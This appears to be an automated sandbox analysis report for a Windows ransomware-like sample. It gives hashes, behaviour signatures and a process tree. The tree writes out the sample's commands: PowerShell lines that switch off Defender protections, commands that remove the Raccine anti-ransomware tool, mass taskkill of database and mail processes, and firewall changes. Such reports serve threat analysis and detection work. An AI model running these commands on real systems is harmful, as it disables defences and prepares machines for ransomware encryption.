Overview
overview
10Static
static
100033c6e1db...le.exe
windows7_x64
100033c6e1db...le.exe
windows10_x64
1002665fcf9c...le.exe
windows7_x64
1002665fcf9c...le.exe
windows10_x64
101c4b55fefc...le.exe
windows7_x64
101c4b55fefc...le.exe
windows10_x64
1048be948c33...le.exe
windows7_x64
1048be948c33...le.exe
windows10_x64
10714f630043...le.exe
windows7_x64
10714f630043...le.exe
windows10_x64
107932343454...le.exe
windows7_x64
107932343454...le.exe
windows10_x64
10aa3e530d45...le.exe
windows7_x64
8aa3e530d45...le.exe
windows10_x64
10b6f774f469...le.exe
windows7_x64
10b6f774f469...le.exe
windows10_x64
10b739791dd0...le.exe
windows7_x64
10b739791dd0...le.exe
windows10_x64
10d6cb46d0b3...le.exe
windows7_x64
10d6cb46d0b3...le.exe
windows10_x64
10e1c46a96ef...le.exe
windows7_x64
10e1c46a96ef...le.exe
windows10_x64
10Analysis
-
max time kernel
19s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
28-05-2021 09:57
Static task
static1
Behavioral task
behavioral1
Sample
0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
0033c6e1db4b59f95b5261ecef244981e068c765f32616b26e23eddf99986454.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral3
Sample
02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
02665fcf9c0ddfb2cd3e04d254f60c5a4453947f7c3df5480316a040c0c8686f.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral5
Sample
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral6
Sample
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral8
Sample
48be948c3345e8c8b10c612a88eeee6bd1bf8af076092cf88268a268e889e698.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral10
Sample
714f630043670cdab4475971a255d836a1366e417cd0b60053bf026551d62409.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral11
Sample
79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral12
Sample
79323434542bf442218be77d3982e167e118dc9954ce9ea1726db42bcac4d249.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral13
Sample
aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral14
Sample
aa3e530d4567c1511126029fac0562ba8aa4ead0a01aceea169ade3e38a37ea7.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral15
Sample
b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
b6f774f46949d54a060dabf2d7d08eef9fd390091f419ce1a2b555bcd58b2d32.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral17
Sample
b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral18
Sample
b739791dd0b159c6c5c7a9f9b2f8ea7fc0c0c43c55561f94128e0863ac890424.bin.sample.exe
Resource
win10v20210408
Behavioral task
behavioral19
Sample
d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
Resource
win7v20210410
Behavioral task
behavioral20
Sample
d6cb46d0b3165c6087b15378ac7742c93cae7b5cf81c00d5fcb37a429b705d00.bin.sample.exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Resource
win7v20210408
Behavioral task
behavioral22
Sample
e1c46a96effc5df063cea2fae83306ae1f0e2f898b0d2ada86c48052be5fe8d3.bin.sample.exe
Resource
win10v20210408
General
-
Target
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe
-
Size
367KB
-
MD5
b31f6216e6bc5a6291a0b82de0377553
-
SHA1
0afdc5359268f7e78a0ca3c3c67752edd304a742
-
SHA256
1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb
-
SHA512
7044cae1da196e1997fd21cbac41ff0d8e7dd5da6ebcf14e4ecd26ff53f65936430c009e473c17a2eecabbc5645e2d1fb32c5ef8ab036d045b5941a52e2982f6
Malware Config
Signatures
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 1 TTPs
-
Modifies file permissions 1 TTPs 64 IoCs
pid Process 4492 icacls.exe 1072 icacls.exe 5268 icacls.exe 2504 icacls.exe 1596 icacls.exe 5856 icacls.exe 4552 icacls.exe 1636 icacls.exe 5256 icacls.exe 5208 icacls.exe 4380 icacls.exe 5740 icacls.exe 4884 icacls.exe 5336 icacls.exe 4960 icacls.exe 4076 icacls.exe 4556 icacls.exe 5232 icacls.exe 6008 icacls.exe 904 icacls.exe 5236 icacls.exe 4416 icacls.exe 2604 icacls.exe 6096 icacls.exe 3120 icacls.exe 2624 icacls.exe 5364 icacls.exe 4932 icacls.exe 4384 icacls.exe 5936 icacls.exe 5304 icacls.exe 1116 icacls.exe 5764 icacls.exe 5664 icacls.exe 5584 icacls.exe 5224 icacls.exe 5424 icacls.exe 4436 icacls.exe 1160 icacls.exe 4452 icacls.exe 6052 icacls.exe 4128 icacls.exe 5768 icacls.exe 4240 icacls.exe 5864 icacls.exe 2624 icacls.exe 2620 icacls.exe 5172 icacls.exe 5816 icacls.exe 3532 icacls.exe 2260 icacls.exe 5276 icacls.exe 5536 icacls.exe 1596 icacls.exe 4476 icacls.exe 5956 icacls.exe 5152 icacls.exe 4488 icacls.exe 1072 icacls.exe 3800 icacls.exe 5384 icacls.exe 5408 icacls.exe 3816 icacls.exe 4328 icacls.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 64 IoCs
pid Process 3788 taskkill.exe 4172 taskkill.exe 5800 taskkill.exe 4496 taskkill.exe 3524 taskkill.exe 4280 taskkill.exe 5560 taskkill.exe 4072 taskkill.exe 3364 taskkill.exe 5912 taskkill.exe 396 taskkill.exe 4736 taskkill.exe 5048 taskkill.exe 4020 taskkill.exe 4832 taskkill.exe 2500 taskkill.exe 5496 taskkill.exe 2164 taskkill.exe 4632 taskkill.exe 1596 taskkill.exe 4144 taskkill.exe 4212 taskkill.exe 2604 taskkill.exe 4544 taskkill.exe 4592 taskkill.exe 4252 taskkill.exe 2604 taskkill.exe 3312 taskkill.exe 1616 taskkill.exe 4984 taskkill.exe 2876 taskkill.exe 4880 taskkill.exe 4908 taskkill.exe 4780 taskkill.exe 5504 taskkill.exe 4492 taskkill.exe 6104 taskkill.exe 2420 taskkill.exe 5012 taskkill.exe 5168 taskkill.exe 5856 taskkill.exe 4668 taskkill.exe 5060 taskkill.exe 4452 taskkill.exe 2988 taskkill.exe 4836 taskkill.exe 4308 taskkill.exe 4148 taskkill.exe 5724 taskkill.exe 4632 taskkill.exe 1264 taskkill.exe 6092 taskkill.exe 2848 taskkill.exe 4896 taskkill.exe 2212 taskkill.exe 5016 taskkill.exe 4436 taskkill.exe 4124 taskkill.exe 5992 taskkill.exe 5052 taskkill.exe 496 taskkill.exe 4976 taskkill.exe 4452 taskkill.exe 2620 taskkill.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 1584 reg.exe 5780 reg.exe -
Runs ping.exe 1 TTPs 6 IoCs
pid Process 4132 PING.EXE 4152 PING.EXE 3752 PING.EXE 6040 PING.EXE 4176 PING.EXE 4500 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 38 IoCs
description pid Process Token: SeDebugPrivilege 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe Token: SeDebugPrivilege 2996 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeIncreaseQuotaPrivilege 1424 powershell.exe Token: SeSecurityPrivilege 1424 powershell.exe Token: SeTakeOwnershipPrivilege 1424 powershell.exe Token: SeLoadDriverPrivilege 1424 powershell.exe Token: SeSystemProfilePrivilege 1424 powershell.exe Token: SeSystemtimePrivilege 1424 powershell.exe Token: SeProfSingleProcessPrivilege 1424 powershell.exe Token: SeIncBasePriorityPrivilege 1424 powershell.exe Token: SeCreatePagefilePrivilege 1424 powershell.exe Token: SeBackupPrivilege 1424 powershell.exe Token: SeRestorePrivilege 1424 powershell.exe Token: SeShutdownPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeSystemEnvironmentPrivilege 1424 powershell.exe Token: SeRemoteShutdownPrivilege 1424 powershell.exe Token: SeUndockPrivilege 1424 powershell.exe Token: SeManageVolumePrivilege 1424 powershell.exe Token: 33 1424 powershell.exe Token: 34 1424 powershell.exe Token: 35 1424 powershell.exe Token: 36 1424 powershell.exe Token: SeDebugPrivilege 2616 sc.exe Token: SeDebugPrivilege 3940 powershell.exe Token: SeDebugPrivilege 2628 taskkill.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 3996 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 2648 powershell.exe Token: SeDebugPrivilege 4104 powershell.exe Token: SeDebugPrivilege 4228 powershell.exe Token: SeDebugPrivilege 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe Token: SeDebugPrivilege 4304 backgroundTaskHost.exe Token: SeDebugPrivilege 4632 taskkill.exe Token: SeDebugPrivilege 4396 5wzwhgdn.exe Token: SeDebugPrivilege 4520 powershell.exe -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 3368 wrote to memory of 2996 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 76 PID 3368 wrote to memory of 2996 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 76 PID 3368 wrote to memory of 1424 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 78 PID 3368 wrote to memory of 1424 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 78 PID 3368 wrote to memory of 2616 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 353 PID 3368 wrote to memory of 2616 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 353 PID 3368 wrote to memory of 3940 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 83 PID 3368 wrote to memory of 3940 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 83 PID 3368 wrote to memory of 2628 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 234 PID 3368 wrote to memory of 2628 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 234 PID 3368 wrote to memory of 3012 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 87 PID 3368 wrote to memory of 3012 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 87 PID 3368 wrote to memory of 3996 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 89 PID 3368 wrote to memory of 3996 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 89 PID 3368 wrote to memory of 2928 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 94 PID 3368 wrote to memory of 2928 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 94 PID 3368 wrote to memory of 2648 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 92 PID 3368 wrote to memory of 2648 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 92 PID 3368 wrote to memory of 4104 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 95 PID 3368 wrote to memory of 4104 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 95 PID 3368 wrote to memory of 4228 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 97 PID 3368 wrote to memory of 4228 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 97 PID 3368 wrote to memory of 4304 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 278 PID 3368 wrote to memory of 4304 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 278 PID 3368 wrote to memory of 4396 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 319 PID 3368 wrote to memory of 4396 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 319 PID 3368 wrote to memory of 4520 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 103 PID 3368 wrote to memory of 4520 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 103 PID 3368 wrote to memory of 4632 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 471 PID 3368 wrote to memory of 4632 3368 1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe 471
Processes
-
C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\1c4b55fefcd78623a6724bb6c7779d0ef02ac20a6069cb9dbd91d753386606bb.bin.sample.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3368 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -EnableControlledFolderAccess Disabled2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1424
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true2⤵PID:2616
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3940
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true2⤵PID:2628
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3996
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:2648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2928
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 02⤵
- Suspicious use of AdjustPrivilegeToken
PID:4104
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 62⤵
- Suspicious use of AdjustPrivilegeToken
PID:4228
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 62⤵PID:4304
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true2⤵PID:4396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 22⤵
- Suspicious use of AdjustPrivilegeToken
PID:4520
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM RaccineSettings.exe2⤵
- Kills process with taskkill
PID:4632
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F2⤵PID:5020
-
-
C:\Windows\SYSTEM32\reg.exe"reg" delete HKCU\Software\Raccine /F2⤵
- Modifies registry key
PID:1584
-
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /DELETE /TN "Raccine Rules Updater" /F2⤵PID:4280
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config Dnscache start= auto2⤵PID:4736
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY start= disabled2⤵PID:3576
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config FDResPub start= auto2⤵PID:1264
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes2⤵PID:4872
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SSDPSRV start= auto2⤵PID:4112
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled2⤵PID:4192
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SstpSvc start= disabled2⤵PID:4568
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config upnphost start= auto2⤵PID:4860
-
-
C:\Windows\SYSTEM32\sc.exe"sc.exe" config SQLWriter start= disabled2⤵PID:4868
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
PID:2848
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM synctime.exe /F2⤵PID:4732
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mspub.exe /F2⤵
- Kills process with taskkill
PID:2620
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopqos.exe /F2⤵PID:4552
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM Ntrtscan.exe /F2⤵
- Kills process with taskkill
PID:2604
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mysqld.exe /F2⤵PID:2420
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqbcoreservice.exe /F2⤵
- Kills process with taskkill
PID:4452
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM mydesktopservice.exe /F2⤵
- Kills process with taskkill
PID:3364
-
-
C:\Windows\SYSTEM32\netsh.exe"netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes2⤵PID:5052
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM isqlplussvc.exe /F2⤵
- Kills process with taskkill
PID:4544
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM firefoxconfig.exe /F2⤵
- Kills process with taskkill
PID:1596
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM agntsvc.exe /F2⤵PID:4412
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM steam.exe /F2⤵PID:4992
-
-
C:\Windows\SYSTEM32\arp.exe"arp" -a2⤵PID:4312
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM onenote.exe /F2⤵PID:4988
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM sqlwriter.exe /F2⤵
- Kills process with taskkill
PID:1616
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /IM thebat.exe /F2⤵
- Kills process with taskkill
PID:4908
-
-
